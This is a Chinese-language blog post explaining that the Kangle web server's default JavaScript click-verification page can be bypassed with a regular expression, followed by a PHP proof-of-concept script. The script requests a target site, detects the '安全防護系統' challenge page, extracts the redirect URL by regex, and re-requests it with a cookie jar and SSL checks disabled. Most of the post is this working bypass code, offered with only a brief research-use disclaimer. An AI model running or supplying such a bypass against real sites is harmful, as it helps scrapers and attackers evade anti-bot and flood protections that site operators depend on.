Kangle 點擊驗證JS Bypass過程以及poc

Kangle默認的點擊驗證很簡單 通過正則匹配即可完全bypass 其次kangle存在ip白名單 如短時間內通過一次驗證 則無需cookie也可直接訪問網站內容

貼上POC

<?php

/*
Bypass BY :wafcloud
僅作技術研究使用,嚴禁用于違法用途
正則即可處理默認kangle 的js點擊驗證
*/
$cookie_jar = tempnam(‘./tmp’,’cookie’);
function curl($cookieUrl,$url = ”, $addHeaders = [], $requestType = ‘get’, $requestData = ”, $postType = ”, $urlencode = true)
{
if (empty($url))
return ”;
//容錯處理
$headers = [
‘User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.1; zh-CN; rv:2.9) Gecko/2018052906 Firefox/3.0’
// ‘Referer:’ . $url
];

if (strtolower($postType) == ‘json’ && $requestType != ‘get’) {
$headers[] = ‘Content-Type: application/json; charset=utf-8’;
$requestData = is_array($requestData) ? json_encode($requestData) : $requestData;
$headers[] = ‘Content-Length: ‘ . strlen($requestData);
}

if (!empty($addHeaders))
$headers = array_merge($headers, $addHeaders);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieUrl);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//設置允許302轉跳

// curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC);
// curl_setopt($ch, CURLOPT_PROXY, ‘127.0.0.1’);
// curl_setopt($ch, CURLOPT_PROXYPORT, ‘123’);
//set proxy

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//add ssl
if ($requestType == ‘get’) {
curl_setopt($ch, CURLOPT_HEADER, false);
} else if ($requestType == ‘post’) {
curl_setopt($ch, CURLOPT_POST, 1);
} else {
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($requestType));
}
//處理類型
if ($requestType != ‘get’) {
if (is_array($requestData) && !empty($requestData)) {
$temp = ”;
foreach ($requestData as $key => $value) {
if ($urlencode) {
$temp .= rawurlencode(rawurlencode($key)) . ‘=’ . rawurlencode(rawurlencode($value)) . ‘&’;
} else {
$temp .= $key . ‘=’ . $value . ‘&’;
}
}
$requestData = substr($temp, 0, strlen($temp) – 1);
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
}

$result = curl_exec($ch);

curl_close($ch);

return $result;
}

function isSafe($html)
{
return preg_match(‘/<title>安全防護系統<\/title>/’, $html) == 1;
}

function getSafeUrl($cookie_jar,$url)
{
$data = curl($cookie_jar,$url);

if (isSafe($data)) {
preg_match(‘/location.href =(.+);/’, $data, $result);
if (count($result) == 2) {
$result = $result[1];
$result = preg_replace(‘/”|\+/’, ”, $result);
$result = preg_replace(‘/\s/’, ”, $result);
return $url . $result;
}
}
return ”;
}
echo curl($cookie_jar,getSafeUrl($cookie_jar,”https://www.123.com/”));

轉載請注明出處 AE博客|墨淵 ? Kangle 點擊驗證JS Bypass過程以及poc

相關推薦

發表評論

路人甲

網友評論(0)